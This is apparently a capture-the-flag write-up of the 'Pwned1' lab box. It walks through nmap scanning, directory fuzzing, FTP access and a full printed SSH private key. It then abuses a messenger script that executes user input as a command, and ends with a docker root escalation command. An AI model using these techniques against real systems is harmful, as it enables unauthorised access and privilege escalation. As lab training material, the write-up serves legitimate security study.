Pwned1 Writeup


This is partical room from tryhackme entitled “Pwned1” form vulnhub. Difficulty of This box is Intermediate and in this box you will learn all about Fuzzing diretory, Custom exploitation, and getting privilage of root. Okay no let’s Pwn this box :p.
As usual we will scan the ip of the box.
$ nmap -sV -sC
Starting Nmap 7.91 ( ) at 2021-02-28 00:29 WIB
Nmap scan report for
Host is up (0.26s latency).
Not shown: 996 closed ports
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
777/tcp filtered multiling-http
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 44.66 seconds
As you can see the box have 3 port open and 1 port filtered. Let’s take a look at web apache.
Nothing to see here but let’s take a look at robots.txt .
# Group 1
User-agent: *
Allow: /nothing
Allow: /hidden_text
There are have something interesting, i’m trying to fuzzing directory with gobuster in /hidden_text then i found secret.dic :
secret.dic :
So i’m trying to fuzz again and i found page in /pwned.vuln.
in this case i’m don’t do injection like sql but just take a look the source code and we found user ftp!.
Now i’m going to login ftpuser with password we found before.
Getting User
As you can see we found folder secret which contains id_rsa and note.txt :
- id_rsa
-----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY-----
- note.txt :
Wow you are here
ariana won't happy about this note
sorry ariana :(
User ariana
You can see we did it so easyly. Now lets login with user credential .
Then let’s take a look at permission of the user ariana sudo -l
ariana@pwned:/home$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass,
User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/
There is permission of ariana to execute bash of selena. Content of is :
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "
$msg 2> /dev/null
echo ""
echo "Message sent to $name :) "
echo ""
User Selena
Now we can getting user selena with put bash -i
in messenger to selena
Privilage Escalation
As you can see selena have permission with docker, then we can escaping from docker and getting a root with this command docker run -v /:/mnt --rm -it alpine chroot /mnt bash
Now we are root
So thats it my writeup i hope you enjoy , Happy hacking :D